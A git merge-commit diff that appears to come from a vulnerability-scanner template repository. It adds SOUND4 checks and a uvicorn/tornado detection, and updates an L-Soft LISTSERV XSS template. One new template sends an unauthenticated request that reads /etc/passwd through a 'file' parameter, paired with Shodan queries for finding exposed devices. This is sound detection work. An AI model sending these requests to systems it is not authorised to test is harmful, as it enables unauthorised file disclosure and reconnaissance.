Merge branch 'main' into uvicorn-detect
commit
e12559a70d
|
@ -9,7 +9,6 @@ reviewers:
|
||||||
- ritikchaddha
|
- ritikchaddha
|
||||||
- DhiyaneshGeek
|
- DhiyaneshGeek
|
||||||
- pussycat0x
|
- pussycat0x
|
||||||
- princechaddha
|
|
||||||
|
|
||||||
# A number of reviewers added to the pull request
|
# A number of reviewers added to the pull request
|
||||||
# Set 0 to add all the reviewers (default: 0)
|
# Set 0 to add all the reviewers (default: 0)
|
||||||
|
@ -17,9 +16,9 @@ numberOfReviewers: 1
|
||||||
|
|
||||||
# A list of assignees, overrides reviewers if set
|
# A list of assignees, overrides reviewers if set
|
||||||
assignees:
|
assignees:
|
||||||
- ritikchaddha
|
|
||||||
- DhiyaneshGeek
|
- DhiyaneshGeek
|
||||||
- pussycat0x
|
- pussycat0x
|
||||||
|
- ritikchaddha
|
||||||
|
|
||||||
# A number of assignees to add to the pull request
|
# A number of assignees to add to the pull request
|
||||||
# Set to 0 to add all of the assignees.
|
# Set to 0 to add all of the assignees.
|
||||||
|
|
|
@ -1 +1,3 @@
|
||||||
cves/2022/CVE-2022-1168.yaml
|
cves/2022/CVE-2022-1168.yaml
|
||||||
|
vulnerabilities/other/sound4-file-disclosure.yaml
|
||||||
|
"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"
|
||||||
|
|
|
@ -2,9 +2,10 @@ id: CVE-2019-15501
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
||||||
author: LogicalHunter
|
author: LogicalHunter,arafatansari
|
||||||
severity: medium
|
severity: medium
|
||||||
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
description: |
|
||||||
|
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/47302
|
- https://www.exploit-db.com/exploits/47302
|
||||||
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
||||||
|
@ -14,6 +15,9 @@ info:
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2019-15501
|
cve-id: CVE-2019-15501
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.html:"LISTSERV"
|
||||||
|
verified: "true"
|
||||||
tags: cve,cve2019,xss,listserv,edb
|
tags: cve,cve2019,xss,listserv,edb
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -24,9 +28,12 @@ requests:
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- '</script><script>alert(document.domain)</script>'
|
- '</script><script>alert(document.domain)</script>'
|
||||||
part: body
|
- 'LISTSERV'
|
||||||
|
condition: and
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
5.3.6
|
5.3.8
|
|
@ -1 +1 @@
|
||||||
4.5.4
|
4.5.5
|
|
@ -3681,3 +3681,8 @@ requests:
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "uvicorn"
|
- "uvicorn"
|
||||||
|
|
||||||
|
name: tornado
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "TornadoServer/"
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: sound4-file-disclosure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
|
||||||
|
author: arafatansari
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
|
||||||
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.html:"SOUND4"
|
||||||
|
verified: "true"
|
||||||
|
tags: packetstorm,lfi,sound4,unauth,disclosure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: sound4-directory-listing
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SOUND4 Impact/Pulse/First/Eco <=2.x - Information Disclosure
|
||||||
|
author: arafatansari
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The application is vulnerable to sensitive directory indexing / information disclosure vulnerability. An unauthenticated attacker can visit the log directory and disclose the server's log files containing sensitive and system information.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html
|
||||||
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"SOUND4"
|
||||||
|
tags: misconfig,listing,sound4,disclosure,packetstorm
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/log/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Index of /log</title>"
|
||||||
|
- "Parent Directory"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue